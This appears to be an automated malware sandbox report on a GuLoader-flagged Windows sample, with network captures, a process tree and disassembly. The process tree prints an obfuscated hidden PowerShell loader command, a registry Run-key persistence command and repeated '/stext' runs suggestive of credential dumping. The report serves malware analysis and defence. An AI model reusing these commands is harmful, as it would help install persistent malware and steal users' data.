                                          Data Ascii: {Y4h]kb0F>QH*pf|~!eEB^u{4tg0_7^Sl9sp;l}kl:Gj#^0o$#={w`z4QdH|UTxZPeayD\%?i+dpy0{:`Ez-Jj:>oD%?FG
                                          Sep 30, 2024 13:59:43.556804895 CEST1236INData Raw: ad ea b1 2c f3 56 8a 29 16 82 a7 07 6f 3c 90 d2 65 b5 cc 8e ba d3 d1 b6 e4 d3 f1 39 98 81 e3 66 0d 9a 1e 6e 04 b5 34 81 32 c6 dd 39 7d 8e b9 85 61 3a c4 3e 70 85 1d 6b d1 23 ed e0 88 44 34 d8 ad 5f 9a 29 84 da e4 ae 71 a9 e8 d3 73 81 4d 91 1f 7a
                                          Data Ascii: ,V)o<e9fn429}a:>pk#D4_)qsMzq^YpDV*^w+#`.{C;|[{0`PGrRio<RAe86inkwqKrz3XX[9wqrjN,]e$NS*0W5x
                                          Sep 30, 2024 13:59:43.561681986 CEST1236INData Raw: e5 f1 a7 82 eb 1b 91 5b 8a f2 e0 e2 62 24 07 a8 6f d0 99 b8 5a f7 ae 21 76 af a5 c5 e7 51 42 ae 99 1c 0e ec ca d8 6a f0 db fc ae bd 30 71 32 df 24 fc 07 e4 82 66 ea 0f d5 26 11 53 ee 43 36 e7 fe d8 90 b4 fe 82 2b f9 16 2e 9b 03 ab 19 62 83 8e 33
                                          Data Ascii: [b$oZ!vQBj0q2$f&SC6+.b3R2u4"Q26%!5n7x,(vQ>f<%tXzt@/$?sY,yot%I+xXi/E&*(&^%.sy2`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449740178.237.33.50805916C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 30, 2024 13:59:47.637548923 CEST71OUTGET /json.gp HTTP/1.1
                                          Host: geoplugin.net
                                          Cache-Control: no-cache
                                          Sep 30, 2024 13:59:48.254547119 CEST1170INHTTP/1.1 200 OK
                                          date: Mon, 30 Sep 2024 11:59:48 GMT
                                          server: Apache
                                          content-length: 962
                                          content-type: application/json; charset=utf-8
                                          cache-control: public, max-age=300
                                          access-control-allow-origin: *
                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:07:57:10
                                          Start date:30/09/2024
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:07:57:11
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                          Imagebase:0x200000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:07:57:11
                                          Start date:30/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:07:59:21
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 24%, ReversingLabs
                                          • Detection: 33%, Virustotal, Browse
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:9
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                          Imagebase:0x240000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                          Imagebase:0x670000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:12
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:15
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:20
                                          Start time:08:01:03
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
                                          Imagebase:0xc00000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:24.7%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:21%
                                            Total number of Nodes:1353
                                            Total number of Limit Nodes:41
                                            execution_graph 3249 4015c1 3250 402c37 17 API calls 3249->3250 3251 4015c8 3250->3251 3268 405bc8 CharNextW CharNextW 3251->3268 3253 401631 3255 401663 3253->3255 3256 401636 3253->3256 3254 405b4a CharNextW 3262 4015d1 3254->3262 3258 401423 24 API calls 3255->3258 3282 401423 3256->3282 3266 40165b 3258->3266 3262->3253 3262->3254 3265 401617 GetFileAttributesW 3262->3265 3274 405819 3262->3274 3277 40577f CreateDirectoryW 3262->3277 3286 4057fc CreateDirectoryW 3262->3286 3264 40164a SetCurrentDirectoryW 3264->3266 3265->3262 3269 405be5 3268->3269 3273 405bf7 3268->3273 3271 405bf2 CharNextW 3269->3271 3269->3273 3270 405c1b 3270->3262 3271->3270 3272 405b4a CharNextW 3272->3273 3273->3270 3273->3272 3289 406626 GetModuleHandleA 3274->3289 3278 4057d0 GetLastError 3277->3278 3279 4057cc 3277->3279 3278->3279 3280 4057df SetFileSecurityW 3278->3280 3279->3262 3280->3279 3281 4057f5 GetLastError 3280->3281 3281->3279 3283 4052b0 24 API calls 3282->3283 3284 401431 3283->3284 3285 40624c lstrcpynW 3284->3285 3285->3264 3287 405810 GetLastError 3286->3287 3288 40580c 3286->3288 3287->3288 3288->3262 3290 406642 3289->3290 3291 40664c GetProcAddress 3289->3291 3295 4065b6 GetSystemDirectoryW 3290->3295 3292 405820 3291->3292 3292->3262 3294 406648 3294->3291 3294->3292 3296 4065d8 wsprintfW LoadLibraryExW 3295->3296 3296->3294 3298 401941 3299 401943 3298->3299 3300 402c37 17 API calls 3299->3300 3301 401948 3300->3301 3304 40595a 3301->3304 3343 405c25 3304->3343 3307 405982 DeleteFileW 3312 401951 3307->3312 3308 405999 3310 405ab9 3308->3310 3357 40624c lstrcpynW 3308->3357 3310->3312 3375 40658f FindFirstFileW 3310->3375 3311 4059bf 3313 4059d2 3311->3313 3314 4059c5 lstrcatW 3311->3314 3358 405b69 lstrlenW 3313->3358 3315 4059d8 3314->3315 3318 4059e8 lstrcatW 3315->3318 3320 4059f3 lstrlenW FindFirstFileW 3315->3320 3318->3320 3320->3310 3328 405a15 3320->3328 3321 405ae2 3378 405b1d lstrlenW CharPrevW 3321->3378 3324 405a9c FindNextFileW 3324->3328 3329 405ab2 FindClose 3324->3329 3325 405912 5 API calls 3327 405af4 3325->3327 3330 405af8 3327->3330 3331 405b0e 3327->3331 3328->3324 3338 405a5d 3328->3338 3362 40624c lstrcpynW 3328->3362 3329->3310 3330->3312 3334 4052b0 24 API calls 3330->3334 3333 4052b0 24 API calls 3331->3333 3333->3312 3336 405b05 3334->3336 3335 40595a 60 API calls 3335->3338 3337 406012 36 API calls 3336->3337 3340 405b0c 3337->3340 3338->3324 3338->3335 3339 4052b0 24 API calls 3338->3339 3341 4052b0 24 API calls 3338->3341 3363 405912 3338->3363 3371 406012 MoveFileExW 3338->3371 3339->3324 3340->3312 3341->3338 3381 40624c lstrcpynW 3343->3381 3345 405c36 3346 405bc8 4 API calls 3345->3346 3347 405c3c 3346->3347 3348 40597a 3347->3348 3349 4064e0 5 API calls 3347->3349 3348->3307 3348->3308 3355 405c4c 3349->3355 3350 405c7d lstrlenW 3351 405c88 3350->3351 3350->3355 3353 405b1d 3 API calls 3351->3353 3352 40658f 2 API calls 3352->3355 3354 405c8d GetFileAttributesW 3353->3354 3354->3348 3355->3348 3355->3350 3355->3352 3356 405b69 2 API calls 3355->3356 3356->3350 3357->3311 3359 405b77 3358->3359 3360 405b89 3359->3360 3361 405b7d CharPrevW 3359->3361 3360->3315 3361->3359 3361->3360 3362->3328 3382 405d19 GetFileAttributesW 3363->3382 3366 405935 DeleteFileW 3369 40593b 3366->3369 3367 40592d RemoveDirectoryW 3367->3369 3368 40593f 3368->3338 3369->3368 3370 40594b SetFileAttributesW 3369->3370 3370->3368 3372 406033 3371->3372 3373 406026 3371->3373 3372->3338 3385 405e98 3373->3385 3376 405ade 3375->3376 3377 4065a5 FindClose 3375->3377 3376->3312 3376->3321 3377->3376 3379 405ae8 3378->3379 3380 405b39 lstrcatW 3378->3380 3379->3325 3380->3379 3381->3345 3383 40591e 3382->3383 3384 405d2b SetFileAttributesW 3382->3384 3383->3366 3383->3367 3383->3368 3384->3383 3386 405ec8 3385->3386 3387 405eee GetShortPathNameW 3385->3387 3412 405d3e GetFileAttributesW CreateFileW 3386->3412 3389 405f03 3387->3389 3390 40600d 3387->3390 3389->3390 3392 405f0b wsprintfA 3389->3392 3390->3372 3391 405ed2 CloseHandle GetShortPathNameW 3391->3390 3393 405ee6 3391->3393 3394 40626e 17 API calls 3392->3394 3393->3387 3393->3390 3395 405f33 3394->3395 3413 405d3e GetFileAttributesW CreateFileW 3395->3413 3397 405f40 3397->3390 3398 405f4f GetFileSize GlobalAlloc 3397->3398 3399 405f71 3398->3399 3400 406006 CloseHandle 3398->3400 3414 405dc1 ReadFile 3399->3414 3400->3390 3405 405f90 lstrcpyA 3408 405fb2 3405->3408 3406 405fa4 3407 405ca3 4 API calls 3406->3407 3407->3408 3409 405fe9 SetFilePointer 3408->3409 3421 405df0 WriteFile 3409->3421 3412->3391 3413->3397 3415 405ddf 3414->3415 3415->3400 3416 405ca3 lstrlenA 3415->3416 3417 405ce4 lstrlenA 3416->3417 3418 405cec 3417->3418 3419 405cbd lstrcmpiA 3417->3419 3418->3405 3418->3406 3419->3418 3420 405cdb CharNextA 3419->3420 3420->3417 3422 405e0e GlobalFree 3421->3422 3422->3400 3433 401e43 3441 402c15 3433->3441 3435 401e49 3436 402c15 17 API calls 3435->3436 3437 401e55 3436->3437 3438 401e61 ShowWindow 3437->3438 3439 401e6c EnableWindow 3437->3439 3440 402abf 3438->3440 3439->3440 3442 40626e 17 API calls 3441->3442 3443 402c2a 3442->3443 3443->3435 4106 402644 4107 402c15 17 API calls 4106->4107 4114 402653 4107->4114 4108 402790 4109 40269d ReadFile 4109->4108 4109->4114 4110 405dc1 ReadFile 4110->4114 4111 402792 4128 406193 wsprintfW 4111->4128 4112 4026dd MultiByteToWideChar 4112->4114 4114->4108 4114->4109 4114->4110 4114->4111 4114->4112 4116 402703 SetFilePointer MultiByteToWideChar 4114->4116 4118 4027a3 4114->4118 4119 405e1f SetFilePointer 4114->4119 4116->4114 4117 4027c4 SetFilePointer 4117->4108 4118->4108 4118->4117 4120 405e3b 4119->4120 4125 405e57 4119->4125 4121 405dc1 ReadFile 4120->4121 4122 405e47 4121->4122 4123 405e60 SetFilePointer 4122->4123 4124 405e88 SetFilePointer 4122->4124 4122->4125 4123->4124 4126 405e6b 4123->4126 4124->4125 4125->4114 4127 405df0 WriteFile 4126->4127 4127->4125 4128->4108 3458 402348 3459 402c37 17 API calls 3458->3459 3460 402357 3459->3460 3461 402c37 17 API calls 3460->3461 3462 402360 3461->3462 3463 402c37 17 API calls 3462->3463 3464 40236a GetPrivateProfileStringW 3463->3464 4139 4016cc 4140 402c37 17 API calls 4139->4140 4141 4016d2 GetFullPathNameW 4140->4141 4142 40170e 4141->4142 4143 4016ec 4141->4143 4144 401723 GetShortPathNameW 4142->4144 4145 402abf 4142->4145 4143->4142 4146 40658f 2 API calls 4143->4146 4144->4145 4147 4016fe 4146->4147 4147->4142 4149 40624c lstrcpynW 4147->4149 4149->4142 4150 401b4d 4151 402c37 17 API calls 4150->4151 4152 401b54 4151->4152 4153 402c15 17 API calls 4152->4153 4154 401b5d wsprintfW 4153->4154 4155 402abf 4154->4155 4156 401f52 4157 402c37 17 API calls 4156->4157 4158 401f59 4157->4158 4159 40658f 2 API calls 4158->4159 4160 401f5f 4159->4160 4162 401f70 4160->4162 4163 406193 wsprintfW 4160->4163 4163->4162 4164 402253 4165 402c37 17 API calls 4164->4165 4166 402259 4165->4166 4167 402c37 17 API calls 4166->4167 4168 402262 4167->4168 4169 402c37 17 API calls 4168->4169 4170 40226b 4169->4170 4171 40658f 2 API calls 4170->4171 4172 402274 4171->4172 4173 402285 lstrlenW lstrlenW 4172->4173 4177 402278 4172->4177 4175 4052b0 24 API calls 4173->4175 4174 4052b0 24 API calls 4178 402280 4174->4178 4176 4022c3 SHFileOperationW 4175->4176 4176->4177 4176->4178 4177->4174 4177->4178 4179 401956 4180 402c37 17 API calls 4179->4180 4181 40195d lstrlenW 4180->4181 4182 40258c 4181->4182 4183 406956 4184 4067da 4183->4184 4185 407145 4184->4185 4186 406864 GlobalAlloc 4184->4186 4187 40685b GlobalFree 4184->4187 4188 4068d2 GlobalFree 4184->4188 4189 4068db GlobalAlloc 4184->4189 4186->4184 4186->4185 4187->4186 4188->4189 4189->4184 4189->4185 4190 401d57 GetDlgItem GetClientRect 4191 402c37 17 API calls 4190->4191 4192 401d89 LoadImageW SendMessageW 4191->4192 4193 401da7 DeleteObject 4192->4193 4194 402abf 4192->4194 4193->4194 4195 402dd7 4196 402e02 4195->4196 4197 402de9 SetTimer 4195->4197 4198 402e57 4196->4198 4199 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4196->4199 4197->4196 4199->4198 4200 4014d7 4201 402c15 17 API calls 4200->4201 4202 4014dd Sleep 4201->4202 4204 402abf 4202->4204 4205 4022d7 4206 4022de 4205->4206 4209 4022f1 4205->4209 4207 40626e 17 API calls 4206->4207 4208 4022eb 4207->4208 4210 4058ae MessageBoxIndirectW 4208->4210 4210->4209 3813 40175c 3814 402c37 17 API calls 3813->3814 3815 401763 3814->3815 3819 405d6d 3815->3819 3817 40176a 3818 405d6d 2 API calls 3817->3818 3818->3817 3820 405d7a GetTickCount GetTempFileNameW 3819->3820 3821 405db0 3820->3821 3822 405db4 3820->3822 3821->3820 3821->3822 3822->3817 4053 4023de 4054 402c37 17 API calls 4053->4054 4055 4023f0 4054->4055 4056 402c37 17 API calls 4055->4056 4057 4023fa 4056->4057 4070 402cc7 4057->4070 4060 402885 4061 402432 4063 40243e 4061->4063 4065 402c15 17 API calls 4061->4065 4062 402c37 17 API calls 4064 402428 lstrlenW 4062->4064 4066 40245d RegSetValueExW 4063->4066 4067 4030fa 35 API calls 4063->4067 4064->4061 4065->4063 4068 402473 RegCloseKey 4066->4068 4067->4066 4068->4060 4071 402ce2 4070->4071 4074 4060e7 4071->4074 4075 4060f6 4074->4075 4076 406101 RegCreateKeyExW 4075->4076 4077 40240a 4075->4077 4076->4077 4077->4060 4077->4061 4077->4062 3423 402862 3424 402c37 17 API calls 3423->3424 3425 402869 FindFirstFileW 3424->3425 3426 402891 3425->3426 3427 40287c 3425->3427 3431 406193 wsprintfW 3426->3431 3429 40289a 3432 40624c lstrcpynW 3429->3432 3431->3429 3432->3427 4218 401563 4219 402a65 4218->4219 4222 406193 wsprintfW 4219->4222 4221 402a6a 4222->4221 4223 401968 4224 402c15 17 API calls 4223->4224 4225 40196f 4224->4225 4226 402c15 17 API calls 4225->4226 4227 40197c 4226->4227 4228 402c37 17 API calls 4227->4228 4229 401993 lstrlenW 4228->4229 4230 4019a4 4229->4230 4231 4019e5 4230->4231 4235 40624c lstrcpynW 4230->4235 4233 4019d5 4233->4231 4234 4019da lstrlenW 4233->4234 4234->4231 4235->4233 4236 404669 4237 404679 4236->4237 4238 40469f 4236->4238 4239 4041e1 18 API calls 4237->4239 4240 404248 8 API calls 4238->4240 4241 404686 SetDlgItemTextW 4239->4241 4242 4046ab 4240->4242 4241->4238 4243 4027e9 4244 4027f0 4243->4244 4245 402a6a 4243->4245 4246 402c15 17 API calls 4244->4246 4247 4027f7 4246->4247 4248 402806 SetFilePointer 4247->4248 4248->4245 4249 402816 4248->4249 4251 406193 wsprintfW 4249->4251 4251->4245 4252 40166a 4253 402c37 17 API calls 4252->4253 4254 401670 4253->4254 4255 40658f 2 API calls 4254->4255 4256 401676 4255->4256 4257 401ced 4258 402c15 17 API calls 4257->4258 4259 401cf3 IsWindow 4258->4259 4260 401a20 4259->4260 3606 4053ef 3607 405410 GetDlgItem GetDlgItem GetDlgItem 3606->3607 3608 405599 3606->3608 3651 404216 SendMessageW 3607->3651 3610 4055a2 GetDlgItem CreateThread CloseHandle 3608->3610 3611 4055ca 3608->3611 3610->3611 3654 405383 OleInitialize 3610->3654 3613 4055f5 3611->3613 3614 4055e1 ShowWindow ShowWindow 3611->3614 3615 40561a 3611->3615 3612 405480 3617 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3612->3617 3616 405655 3613->3616 3619 405609 3613->3619 3620 40562f ShowWindow 3613->3620 3653 404216 SendMessageW 3614->3653 3621 404248 8 API calls 3615->3621 3616->3615 3626 405663 SendMessageW 3616->3626 3624 4054f5 3617->3624 3625 4054d9 SendMessageW SendMessageW 3617->3625 3627 4041ba SendMessageW 3619->3627 3622 405641 3620->3622 3623 40564f 3620->3623 3632 405628 3621->3632 3628 4052b0 24 API calls 3622->3628 3629 4041ba SendMessageW 3623->3629 3630 405508 3624->3630 3631 4054fa SendMessageW 3624->3631 3625->3624 3626->3632 3633 40567c CreatePopupMenu 3626->3633 3627->3615 3628->3623 3629->3616 3635 4041e1 18 API calls 3630->3635 3631->3630 3634 40626e 17 API calls 3633->3634 3636 40568c AppendMenuW 3634->3636 3637 405518 3635->3637 3638 4056a9 GetWindowRect 3636->3638 3639 4056bc TrackPopupMenu 3636->3639 3640 405521 ShowWindow 3637->3640 3641 405555 GetDlgItem SendMessageW 3637->3641 3638->3639 3639->3632 3643 4056d7 3639->3643 3644 405544 3640->3644 3645 405537 ShowWindow 3640->3645 3641->3632 3642 40557c SendMessageW SendMessageW 3641->3642 3642->3632 3646 4056f3 SendMessageW 3643->3646 3652 404216 SendMessageW 3644->3652 3645->3644 3646->3646 3647 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3646->3647 3649 405735 SendMessageW 3647->3649 3649->3649 3650 40575e GlobalUnlock SetClipboardData CloseClipboard 3649->3650 3650->3632 3651->3612 3652->3641 3653->3613 3655 40422d SendMessageW 3654->3655 3658 4053a6 3655->3658 3656 4053cd 3657 40422d SendMessageW 3656->3657 3659 4053df CoUninitialize 3657->3659 3658->3656 3660 401389 2 API calls 3658->3660 3660->3658 3661 40176f 3662 402c37 17 API calls 3661->3662 3663 401776 3662->3663 3664 401796 3663->3664 3665 40179e 3663->3665 3721 40624c lstrcpynW 3664->3721 3722 40624c lstrcpynW 3665->3722 3668 40179c 3672 4064e0 5 API calls 3668->3672 3669 4017a9 3670 405b1d 3 API calls 3669->3670 3671 4017af lstrcatW 3670->3671 3671->3668 3677 4017bb 3672->3677 3673 40658f 2 API calls 3673->3677 3674 405d19 2 API calls 3674->3677 3676 4017cd CompareFileTime 3676->3677 3677->3673 3677->3674 3677->3676 3678 40188d 3677->3678 3681 40624c lstrcpynW 3677->3681 3688 40626e 17 API calls 3677->3688 3697 401864 3677->3697 3699 405d3e GetFileAttributesW CreateFileW 3677->3699 3723 4058ae 3677->3723 3679 4052b0 24 API calls 3678->3679 3682 401897 3679->3682 3680 4052b0 24 API calls 3687 401879 3680->3687 3681->3677 3700 4030fa 3682->3700 3685 4018be SetFileTime 3686 4018d0 CloseHandle 3685->3686 3686->3687 3689 4018e1 3686->3689 3688->3677 3690 4018e6 3689->3690 3691 4018f9 3689->3691 3692 40626e 17 API calls 3690->3692 3693 40626e 17 API calls 3691->3693 3695 4018ee lstrcatW 3692->3695 3696 401901 3693->3696 3695->3696 3698 4058ae MessageBoxIndirectW 3696->3698 3697->3680 3697->3687 3698->3687 3699->3677 3701 403113 3700->3701 3702 40313e 3701->3702 3737 4032f5 SetFilePointer 3701->3737 3727 4032df 3702->3727 3706 40315b GetTickCount 3717 40316e 3706->3717 3707 40327f 3708 403283 3707->3708 3712 40329b 3707->3712 3710 4032df ReadFile 3708->3710 3709 4018aa 3709->3685 3709->3686 3710->3709 3711 4032df ReadFile 3711->3712 3712->3709 3712->3711 3714 405df0 WriteFile 3712->3714 3713 4032df ReadFile 3713->3717 3714->3712 3716 4031d4 GetTickCount 3716->3717 3717->3709 3717->3713 3717->3716 3718 4031fd MulDiv wsprintfW 3717->3718 3720 405df0 WriteFile 3717->3720 3730 4067a7 3717->3730 3719 4052b0 24 API calls 3718->3719 3719->3717 3720->3717 3721->3668 3722->3669 3724 4058c3 3723->3724 3725 40590f 3724->3725 3726 4058d7 